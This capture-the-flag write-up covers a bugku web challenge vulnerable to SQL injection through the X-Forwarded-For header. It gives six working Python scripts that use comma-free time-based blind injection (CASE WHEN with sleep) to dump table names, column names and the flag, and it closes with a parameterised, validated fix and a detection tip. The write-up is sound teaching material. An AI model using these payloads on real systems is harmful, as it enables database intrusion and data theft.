bugku-Web-INSERT INTO injection (the CASE trick: time-based blind injection with commas filtered, plus time-based injection scripts)

flag format: flag{xxxxxxxxxxxx}
Why not write it in Python

```php
<?php
error_reporting(0);

function getIp(){
    $ip = '';
    // The client-supplied X-Forwarded-For header is trusted when present
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    // Split on commas and keep only the first hop; this is the only "filtering" applied
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
// The ip is concatenated straight into the query: no escaping, no placeholder
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
```

Clearly, the ip comes from the X-Forwarded-For header or from REMOTE_ADDR and is then concatenated straight into an INSERT INTO statement, so the injection payload can be placed in this ip.

Error-based injection was tried first: nothing is echoed back. Boolean-based blind was tried as well, but the page never errors no matter what value length(database()) is compared against.

That leaves time-based blind injection. A quick check of the database-name length produces a measurable delay, and the length comes out as 5.

In the code above the ip is split on commas and only the first part is kept, so commas are effectively filtered and the time-based payload cannot use if(), whose arguments are comma-separated.

CASE WHEN ... THEN ... END is used instead; everything else is the same as an if-based time injection. The scripts follow (MySQL keywords are case-insensitive):

1. Get the combined length of the table names (we already have the database-name length, and database() can stand in for the name, so the database name is not dumped here; if you want it, dump it yourself: web15)

```python
import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://123.206.87.240:8002/web15/'
# Comparing the character at position {0} with '' is true only past the end of the
# string; CASE replaces if(), and "substr(... from N for 1)" avoids any comma
xff = "'+(select case when(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema=database()) from {0} for 1)='')then sleep(4) else 1 end) + '1"
for i in range(1, 30):
    try:
        headers = {'x-forwarded-for': xff.format(i)}
        r = requests.get(url, headers=headers, timeout=3)
    except requests.exceptions.ReadTimeout:
        # A timeout means sleep(4) fired, i.e. position i is past the end
        print(i)
        break
```

The result is 15, so the combined table-name length is 14.

2. Dump the table names

```python
import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'
url = 'http://123.206.87.240:8002/web15/'
# separator '@' as in the length script, since the default ',' separator cannot be sent
xff = "'+(select case when(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema=database()) from {0} for 1)='{1}')then sleep(4) else 1 end) + '1"
table = ''
for i in range(1, 15):
    for j in dic:
        try:
            headers = {'x-forwarded-for': xff.format(i, j)}
            r = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            # Timeout means the guessed character j matched position i
            table += j
            print(table)
print(table)
```

Result: client_ip@flag

3. Get the combined length of the column names

```python
import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://123.206.87.240:8002/web15/'
# Same length probe as step 1, now against information_schema.columns for the flag table
xff = "'+(select case when(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='flag') from {0} for 1)='')then sleep(4) else 1 end) + '1"
for i in range(1, 30):
    try:
        headers = {'x-forwarded-for': xff.format(i)}
        r = requests.get(url, headers=headers, timeout=3)
    except requests.exceptions.ReadTimeout:
        print(i)
        break
```

Column-name length is 4.

4. Dump the column names

```python
import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'
url = 'http://123.206.87.240:8002/web15/'
xff = "'+(select case when(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='flag') from {0} for 1)='{1}')then sleep(4) else 1 end) + '1"
column = ''
for i in range(1, 5):
    for j in dic:
        try:
            headers = {'x-forwarded-for': xff.format(i, j)}
            r = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            column += j
            print(column)
print(column)
```

There is only one column, named flag.

5. Get the length of the content

```python
import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://123.206.87.240:8002/web15/'
xff = "'+(select case when(substr((select flag from flag) from {0} for 1)='')then sleep(4) else 1 end) + '1"
for i in range(1, 50):
    try:
        headers = {'x-forwarded-for': xff.format(i)}
        r = requests.get(url, headers=headers, timeout=3)
        print(i)  # position i is still inside the string
    except requests.exceptions.ReadTimeout:
        print(i)  # first position past the end
        break
```

Content length is 32.

6. Dump the content (i.e. the flag)

```python
import requests

dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://123.206.87.240:8002/web15/'
xff = "'+(select case when(substr((select flag from flag) from {0} for 1)='{1}')then sleep(4) else 1 end) + '1"
dump = ''
for i in range(1, 33):
    for j in dic:
        try:
            headers = {'x-forwarded-for': xff.format(i, j)}
            r = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.ReadTimeout:
            dump += j
            print(dump)
print(dump)
```

Result: cdbf14c9551d5be5612f7bb5d2867853
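The whole chain above rests on getIp() returning an unvalidated string that is spliced into the INSERT. As an added example (not part of the original writeup or the challenge code), here is a Python mirror of that handler that validates the first X-Forwarded-For hop as an IP address and inserts it through a bound parameter; sqlite3 stands in for MySQL, and the sample headers are constructed.

```python
import ipaddress
import sqlite3

# Constructed sample requests: a benign proxied client, a request carrying the
# kind of CASE/sleep payload used above, and one with no XFF header at all.
SAMPLE_HEADERS = [
    {"X-Forwarded-For": "203.0.113.7, 10.0.0.1"},
    {"X-Forwarded-For": "'+(select case when(1=1)then sleep(4) else 1 end) + '1"},
    {},
]
REMOTE_ADDR = "198.51.100.23"  # stand-in for $_SERVER['REMOTE_ADDR']


def get_ip(headers, remote_addr):
    """Same lookup order as the challenge's getIp(): first hop of
    X-Forwarded-For, else REMOTE_ADDR. Returns None instead of an
    arbitrary string when the value is not a valid IPv4/IPv6 address."""
    raw = headers.get("X-Forwarded-For", remote_addr)
    candidate = raw.split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return None


def record_ip(conn, headers, remote_addr):
    """Store the client IP with a parameterised INSERT. Returns False when
    the value was rejected by get_ip(), in which case nothing is stored."""
    ip = get_ip(headers, remote_addr)
    if ip is None:
        return False
    # The value is bound as a parameter, never concatenated into SQL text,
    # so even a string that passed validation cannot alter the statement.
    conn.execute("INSERT INTO client_ip (ip) VALUES (?)", (ip,))
    return True


def run_samples():
    """Run the constructed headers through record_ip() against an in-memory DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client_ip (ip TEXT)")
    results = [record_ip(conn, h, REMOTE_ADDR) for h in SAMPLE_HEADERS]
    stored = [row[0] for row in conn.execute("SELECT ip FROM client_ip")]
    return results, stored


if __name__ == "__main__":
    print(run_samples())
```

A spike of requests whose first X-Forwarded-For hop fails ipaddress validation is also a cheap detection signal for this kind of probing.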
